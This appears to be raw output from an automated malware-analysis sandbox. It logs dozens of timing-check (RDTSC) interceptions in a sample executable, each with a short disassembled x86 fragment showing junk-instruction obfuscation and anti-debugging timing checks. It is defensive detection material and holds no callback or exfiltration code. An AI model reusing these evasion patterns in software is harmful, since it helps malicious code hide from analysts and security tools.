Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE54FD second address: EE5503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE5503 second address: EE5518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE6FCF second address: EE6FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EED30F second address: EED319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2BDCD5A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EED319 second address: EED31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EED31D second address: EED323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EED323 second address: EED328 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0061 second address: 6EC0101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F2BDCD5A7B7h 0x00000010 call 00007F2BDCD5A7B8h 0x00000015 pop eax 0x00000016 pop edi 0x00000017 pushad 0x00000018 movzx eax, di 0x0000001b pushfd 0x0000001c jmp 00007F2BDCD5A7B3h 0x00000021 and ax, 33FEh 0x00000026 jmp 00007F2BDCD5A7B9h 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007F2BDCD5A7AEh 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0101 second address: 6EC0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0105 second address: 6EC0122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0122 second address: 6EC0128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0128 second address: 6EC012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC012C second address: 6EC0154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e jmp 00007F2BDC8ABB1Fh 0x00000013 sub esp, 18h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ecx, edi 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0154 second address: 6EC018E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e push esi 0x0000000f mov edx, 4F4FF35Ch 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2BDCD5A7AEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC018E second address: 6EC01C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2BDC8ABB1Eh 0x00000013 adc ch, FFFFFFD8h 0x00000016 jmp 00007F2BDC8ABB1Bh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC01C0 second address: 6EC0208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007F2BDCD5A7AEh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2BDCD5A7B7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0208 second address: 6EC020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC020F second address: 6EC0259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F2BDCD5A7ADh 0x0000000f xor eax, 385C3136h 0x00000015 jmp 00007F2BDCD5A7B1h 0x0000001a popfd 0x0000001b jmp 00007F2BDCD5A7B0h 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 pushad 0x00000024 mov edi, ecx 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov dl, C7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0259 second address: 6EC02D2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2BDC8ABB1Eh 0x00000008 or cl, FFFFFFB8h 0x0000000b jmp 00007F2BDC8ABB1Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov esi, dword ptr [775606ECh] 0x0000001a jmp 00007F2BDC8ABB26h 0x0000001f test esi, esi 0x00000021 jmp 00007F2BDC8ABB20h 0x00000026 jne 00007F2BDC8ACC63h 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F2BDC8ABB1Ch 0x00000035 sub esi, 53574778h 0x0000003b jmp 00007F2BDC8ABB1Bh 0x00000040 popfd 0x00000041 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC02D2 second address: 6EC0338 instructions: 0x00000000 rdtsc 0x00000002 call 00007F2BDCD5A7B8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F2BDCD5A7ABh 0x00000010 and si, A3EEh 0x00000015 jmp 00007F2BDCD5A7B9h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2BDCD5A7B8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0338 second address: 6EC033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC033C second address: 6EC0342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0342 second address: 6EC0348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0348 second address: 6EC034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC034C second address: 6EC036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2BDC8ABB21h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC036A second address: 6EC036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC036E second address: 6EC0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0374 second address: 6EC037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC037A second address: 6EC037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC037E second address: 6EC03B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F2BDCD5A7B0h 0x00000011 call dword ptr [77530B60h] 0x00000017 mov eax, 756AE5E0h 0x0000001c ret 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC03B7 second address: 6EC03D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC03D4 second address: 6EC03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC03DA second address: 6EC03DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC03DE second address: 6EC0417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop esi 0x00000012 call 00007F2BDCD5A7B7h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0417 second address: 6EC0430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0430 second address: 6EC043F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC043F second address: 6EC04AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007F2BDC8ABB29h 0x0000000c jmp 00007F2BDC8ABB1Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2BDC8ABB24h 0x0000001d xor si, B8C8h 0x00000022 jmp 00007F2BDC8ABB1Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F2BDC8ABB26h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC04AE second address: 6EC0529 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2BDCD5A7B2h 0x00000008 sbb eax, 6050BE58h 0x0000000e jmp 00007F2BDCD5A7ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F2BDCD5A7B2h 0x00000021 jmp 00007F2BDCD5A7B5h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F2BDCD5A7B0h 0x0000002d xor eax, 27988318h 0x00000033 jmp 00007F2BDCD5A7ABh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0529 second address: 6EC055D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDC8ABB1Fh 0x00000009 adc ax, FFDEh 0x0000000e jmp 00007F2BDC8ABB29h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC055D second address: 6EC058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, edi 0x00000008 jmp 00007F2BDCD5A7ACh 0x0000000d push dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2BDCD5A7B7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC058C second address: 6EC05AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 5238h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr fs:[00000030h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2BDC8ABB1Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC05AA second address: 6EC05C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2BDCD5A7B1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC05C0 second address: 6EC05DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [eax+18h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2BDC8ABB23h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC05DF second address: 6EC05E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC05E5 second address: 6EC05E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC05E9 second address: 6EC05ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0607 second address: 6EC067C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDC8ABB21h 0x00000009 sbb ecx, 7E3C6396h 0x0000000f jmp 00007F2BDC8ABB21h 0x00000014 popfd 0x00000015 mov ax, 2807h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov esi, eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F2BDC8ABB24h 0x00000025 adc al, FFFFFFE8h 0x00000028 jmp 00007F2BDC8ABB1Bh 0x0000002d popfd 0x0000002e popad 0x0000002f test esi, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F2BDC8ABB25h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC067C second address: 6EC068C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDCD5A7ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC068C second address: 6EC06BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F2C4CECAB21h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2BDC8ABB25h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC06BA second address: 6EC0768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F2BDCD5A7ADh 0x00000012 adc ecx, 20C34A76h 0x00000018 jmp 00007F2BDCD5A7B1h 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F2BDCD5A7AEh 0x00000025 jmp 00007F2BDCD5A7B5h 0x0000002a popfd 0x0000002b mov di, si 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [esi], edi 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 pop edx 0x00000036 mov bx, cx 0x00000039 popad 0x0000003a pushfd 0x0000003b jmp 00007F2BDCD5A7AEh 0x00000040 sub ax, E128h 0x00000045 jmp 00007F2BDCD5A7ABh 0x0000004a popfd 0x0000004b popad 0x0000004c mov dword ptr [esi+04h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F2BDCD5A7B5h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0768 second address: 6EC0794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007F2BDC8ABB1Eh 0x00000011 mov dword ptr [esi+0Ch], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0794 second address: 6EC07F8 instructions: 0x00000000 rdtsc 0x00000002 mov si, 48F5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c pushad 0x0000000d jmp 00007F2BDCD5A7AEh 0x00000012 mov eax, 3E0126E1h 0x00000017 popad 0x00000018 mov dword ptr [esi+10h], eax 0x0000001b jmp 00007F2BDCD5A7ACh 0x00000020 mov eax, dword ptr [ebx+50h] 0x00000023 jmp 00007F2BDCD5A7B0h 0x00000028 mov dword ptr [esi+14h], eax 0x0000002b pushad 0x0000002c mov ecx, 50D420FDh 0x00000031 mov ah, CFh 0x00000033 popad 0x00000034 mov eax, dword ptr [ebx+54h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F2BDCD5A7B0h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC07F8 second address: 6EC0875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2DB8A1B4h 0x00000008 pushfd 0x00000009 jmp 00007F2BDC8ABB1Dh 0x0000000e adc esi, 64E81576h 0x00000014 jmp 00007F2BDC8ABB21h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esi+18h], eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 mov bx, B5FEh 0x00000026 pop ebx 0x00000027 mov di, cx 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+58h] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F2BDC8ABB23h 0x00000037 xor eax, 0CDF0B5Eh 0x0000003d jmp 00007F2BDC8ABB29h 0x00000042 popfd 0x00000043 mov di, ax 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0875 second address: 6EC0923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDCD5A7B3h 0x00000009 adc ecx, 6CE7A56Eh 0x0000000f jmp 00007F2BDCD5A7B9h 0x00000014 popfd 0x00000015 call 00007F2BDCD5A7B0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+1Ch], eax 0x00000021 jmp 00007F2BDCD5A7B1h 0x00000026 mov eax, dword ptr [ebx+5Ch] 0x00000029 jmp 00007F2BDCD5A7AEh 0x0000002e mov dword ptr [esi+20h], eax 0x00000031 jmp 00007F2BDCD5A7B0h 0x00000036 mov eax, dword ptr [ebx+60h] 0x00000039 pushad 0x0000003a mov si, 018Dh 0x0000003e push esi 0x0000003f mov di, 21BCh 0x00000043 pop edx 0x00000044 popad 0x00000045 mov dword ptr [esi+24h], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F2BDCD5A7B7h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0923 second address: 6EC0929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0929 second address: 6EC092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC092D second address: 6EC0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0931 second address: 6EC0954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c movsx ebx, cx 0x0000000f mov ebx, esi 0x00000011 popad 0x00000012 mov dword ptr [esi+28h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2BDCD5A7AAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0954 second address: 6EC095A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC095A second address: 6EC096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDCD5A7ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC096B second address: 6EC0A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e jmp 00007F2BDC8ABB1Eh 0x00000013 mov dword ptr [esi+2Ch], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2BDC8ABB1Eh 0x0000001d jmp 00007F2BDC8ABB25h 0x00000022 popfd 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F2BDC8ABB1Eh 0x0000002a xor eax, 6A8DB988h 0x00000030 jmp 00007F2BDC8ABB1Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F2BDC8ABB28h 0x0000003c adc al, FFFFFFE8h 0x0000003f jmp 00007F2BDC8ABB1Bh 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 mov ax, word ptr [ebx+6Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F2BDC8ABB20h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0A20 second address: 6EC0A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0A24 second address: 6EC0A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0A2A second address: 6EC0A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F2BDCD5A7B0h 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2BDCD5A7B7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0A70 second address: 6EC0AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2BDC8ABB1Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0AA0 second address: 6EC0AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0AA6 second address: 6EC0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
